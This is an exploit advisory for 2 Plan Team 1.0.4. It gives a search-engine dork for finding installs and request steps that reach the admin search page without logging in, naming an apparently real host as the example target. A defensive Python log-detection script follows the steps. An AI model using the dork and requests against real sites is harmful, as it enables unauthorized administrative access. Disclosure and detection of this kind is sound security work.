====================================================================================================================================
| # Title : 2 Plan Team 1.0.4 - From XSS to Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 French V.(Pro) / browser : Mozilla Firefox 65.0 (32-bit) |
| # Vendor : http://2-plan.com/ |
| # Dork : "Login @ 2-plan" |
====================================================================================================================================
poc :
[+] Dorking in Google or other search engine.
[+] Use payload : /admin.php/managesearch.php?query=hacked&action=search
[+] It shows an XSS error and a search box (not a reflected or stored XSS).
[+] In the search box type anything & press Enter
[+] Now, in the browser, remove (admin.php/) from the 1st payload ==> /admin.php/managesearch.php?query=hacked&action=search & press Enter
[+] http://downrange.biz.ht//admin.php/managesearch.php?query=hacked&action=search
[+] http://downrange.biz.ht/managesearch.php?query=hacked&action=search
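
For defenders reviewing web server logs, the request sequence in the steps above can be detected as follows. This is an added example, not part of the original advisory or of 2-plan's code; it assumes Apache/nginx combined-format access logs, and the names classify, find_sequences and SAMPLE as well as the log lines themselves are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def classify(path):
    """Return (script, kind): kind is 'chained' when a .php script is
    requested through the PATH_INFO of another .php script
    (e.g. /admin.php/managesearch.php), 'direct' when requested on its own."""
    segs = [s for s in unquote(path).split("/") if s]
    if not segs or not segs[-1].lower().endswith(".php"):
        return None, None
    script = segs[-1].lower()
    chained = any(s.lower().endswith(".php") for s in segs[:-1])
    return script, ("chained" if chained else "direct")

def find_sequences(lines):
    """Flag every chained request, and every successful direct request to the
    same script made later by the same client (the order used in the steps)."""
    seen_chained = {}   # (client, script) -> line number of first chained hit
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, status = m.groups()
        script, kind = classify(urlsplit(target).path)
        if kind == "chained":
            seen_chained.setdefault((client, script), n)
            findings.append((n, client, "php-in-path-info", script))
        elif kind == "direct" and (client, script) in seen_chained \
                and status.startswith("2"):
            findings.append((n, client, "direct-after-chained", script))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up sizes and times).
SAMPLE = [
    '203.0.113.7 - - [10/Mar/2019:10:00:01 +0000] "GET /admin.php/managesearch.php?query=test&action=search HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Mar/2019:10:00:09 +0000] "GET /managesearch.php?query=test&action=search HTTP/1.1" 200 8342',
    '198.51.100.4 - - [10/Mar/2019:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 2210',
    '198.51.100.4 - - [10/Mar/2019:10:01:05 +0000] "GET /managesearch.php?query=plan&action=search HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for finding in find_sequences(SAMPLE):
        print(finding)
```

A "direct-after-chained" hit is a lead for review, not proof: the access log alone does not show whether the client held a valid session.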
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================